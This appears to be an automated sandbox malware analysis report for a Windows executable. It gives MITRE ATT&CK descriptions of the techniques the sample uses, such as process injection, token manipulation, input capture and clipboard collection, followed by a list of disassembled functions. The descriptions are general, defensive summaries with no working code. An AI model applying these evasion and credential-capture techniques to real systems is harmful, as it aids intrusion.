Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report E7CThb0bFa

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: E7CThb0bFa.exe PID: 6988 Parent PID: 5952

General

Chronological Activities

Function 004054DC, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Function 0044A5F4, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 399
COMMON

Function 00437334, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Function 0044A56C, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Function 00437100, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103
registrylibraryloaderCOMMON

Function 0044A074, Relevance: 13.6, APIs: 9, Instructions: 132
windowregistryCOMMON

Function 00449D58, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130
windowCOMMON

Function 00449450, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Function 00401B76, Relevance: 6.1, APIs: 4, Instructions: 55
memoryCOMMON

Function 00401B78, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Function 004224C4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Function 00448C44, Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Function 00449000, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 004015D8, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 00406BE4, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Function 00405248, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 00407E58, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Function 0040177C, Relevance: 1.3, APIs: 1, Instructions: 71
memoryCOMMON

Function 0040183C, Relevance: 1.3, APIs: 1, Instructions: 67
COMMON

Function 0041A898, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Function 00424218, Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266
libraryloaderCOMMON

Function 00405304, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
stringlibraryfileCOMMON

Function 004475DC, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407
windowCOMMON

Function 00432878, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Function 0043F83C, Relevance: 9.4, APIs: 6, Instructions: 405
nativeCOMMONCrypto

Function 0044ADC0, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Function 00431FF8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Function 00444A1C, Relevance: 7.8, APIs: 5, Instructions: 284
windowCOMMONCrypto

Function 0044AD10, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Function 004225DC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Function 00426D88, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Function 00430020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Function 00449B50, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Function 00431744, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Function 0041DA04, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Function 0040C424, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 0042D190, Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Function 004085C0, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Function 00424C58, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Function 00405E24, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Function 0041DFA0, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Function 0040AE50, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 0040AE9C, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Function 00409924, Relevance: 1.5, APIs: 1, Instructions: 6
timeCOMMON

Function 00406179, Relevance: .1, Instructions: 118
COMMON

Function 00436D04, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Function 0040DD9C, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Function 0041DC50, Relevance: 24.2, APIs: 16, Instructions: 248
windowCOMMON

Function 00406C3C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Function 0041FBCC, Relevance: 18.2, APIs: 12, Instructions: 194
windowCOMMON

Function 00422988, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Function 004332C8, Relevance: 16.7, APIs: 11, Instructions: 224
COMMON

Function 004208F0, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 351
COMMON

Function 00430418, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Function 00425EC8, Relevance: 15.1, APIs: 10, Instructions: 142
COMMON

Function 00446BA0, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Function 0040B554, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56
filewindowCOMMON

Function 0042BB64, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Function 0041DABC, Relevance: 13.6, APIs: 9, Instructions: 131
windowCOMMON

Function 0040C688, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Function 0040EF1C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141
COMMON